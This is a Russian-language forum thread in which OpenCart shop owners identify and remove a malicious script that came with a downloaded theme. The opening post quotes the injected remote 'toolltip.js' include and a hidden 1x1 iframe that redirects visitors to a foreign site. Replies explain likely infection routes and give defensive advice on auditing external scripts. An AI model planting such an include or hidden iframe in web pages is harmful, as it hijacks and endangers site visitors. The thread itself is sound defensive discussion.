Всем привет! Кто сталкивался с темой вирусов на сайте? Как их определить и как их лечить? Обнаружил на своем сайте скрипт <script src="http://hi-shop.googlecode.com/files/toolltip.js" type="text/javascript" language="javascript"> который подгружает фрейм и после загрузки страницы страницы перекидывает на сайт, который видно в коде фрейма <iframe id="dynstuff" width="1" scrolling="no" height="1" frameborder="0" vspace="0" hspace="0" marginheight="0" marginwidth="0" src="http://shopxinh.vn/van-chuyen"> Версия OC 1.5.3.1. Встретил это совсем недавно, буквально пару часов назад. Сижу за ПК, на котором лицензионный Касперский End Protection, как трипак подхватил на сайт, не понял
вроде ни Яндекс ни Гугл не ругаются на вирусы... А кто вообще встречал на сайте вирусы? (я не имею ввиду сторонние) я про свои сайты...как определить вирус, как и кто лечил?
R4an_93, подхватить можно через дырявые скрипты или утащили пароль из фтп клиента (если вы или кто-то другой его сохранял), также бывает такой код добавляют в нуленные скрипты. Можно скачать архив с хостинга и поискать код на локалке (в тотал коммандере, напр.,) и почистить ручками (если код не в большом кол-ве файлов). Вот здесь уже ругались на этот код - http://forum.opencart.com/viewtopic.php?t=86101 Opencart v 1.5.4 Theme: Fortuna
Яндекс вебмастер и так высветит сообщение если вирус на вашем сайте, как уже кто-то предложил AI-Bolit - выход, но лично у меня он не работает, сканирует только сам себя, и заявляет, что всё чики-пуки.
Проверить можно тут http://online.us.drweb.com/?url=1 или тут http://www.siteadvisor.com/sites/ неплохие сервисы последний показывает цепочку заражения ,
Интересно, а как все же внешне можно определить, что делают вирусы на сайте? Может добавляют какие-нить рекламные блоки, кто что видел? может какие то "интересные" вирусы попадались
Реклама, поп ап блоки ,редирект на вирусные загрузки и тд и тп .... В основном сечас мало кто работает над похищением кук . В основном цель перенаправить пользователя по нужному адресу .....
просто изначально появился вопрос изза того, что появилась какая то ява-скрипт библиотека tooltip.js, типа от гугл, которая перекидывала на какой то левый китайский сайт...
Да он всю жизнь там был=) от в 3 блоках выводится в теле шапке и футтере но tooltip JS нужен для темы..скачай нормальный и замени качай тут
Эта же ерунда была у меня в скачанном тут шаблоне, через некоторое время сайт стал редиректиться на китайский адрес, т.е. некоторое время скрипт выжидал. Просто удалил код скрипта этого и все.
тож самое было. так это получается вирус...а нормальный tooltip можно и не ставить, так? ) в какой теме он нужен и для чего?
Не совсем вирус, тут ситуация неуправляемая, виновник - кто выложил шаблон (не обязательно тут на сайте). Проблема в чем: 1 имеем вставку скрипта, который динамически подгружается из неизвестного источника, похожего на google 2 по началу у нас сам выгружаемый скрипт может быть нормальным 3 владелец репозитария меняет скрипт на что угодно, вставляет от вируса до рекламного баннера 4 мы начинаем замечать траблы Нужно проверять темы и модули, которые качаем на шару, смотреть все подключения .js и проверять источники, сама по себе ссылка http://hi-shop.googlecode.com/files/toolltip.js подозрительна в этом месте: http://hi-shop....это ж поддомен. Я думаю, что все подобные скрипты нужно скачивать и включать локально, на своем сервере, т.к. на момент проверки сайта может быть все ок, а потом владелец репозитария поменяет код и у нас проблема. --- добавлено: Apr 7, 2013 3:24 PM --- да, и этот файл совсем не значит, что там будет тултип, просто назвали так, чтоб обмануть бдительность
Более менее становится все ясно ) А вообще наличие тестового домена - это конечно всегда здорово. На локальном сервере или нет, тут уже не важно. Самое главное, чтобы, перед тем как залить на рабочий магазин, проверять нужно на тестовом магазине. Да и конечно, тестовый домен должен быть 100 % точной копией рабочего
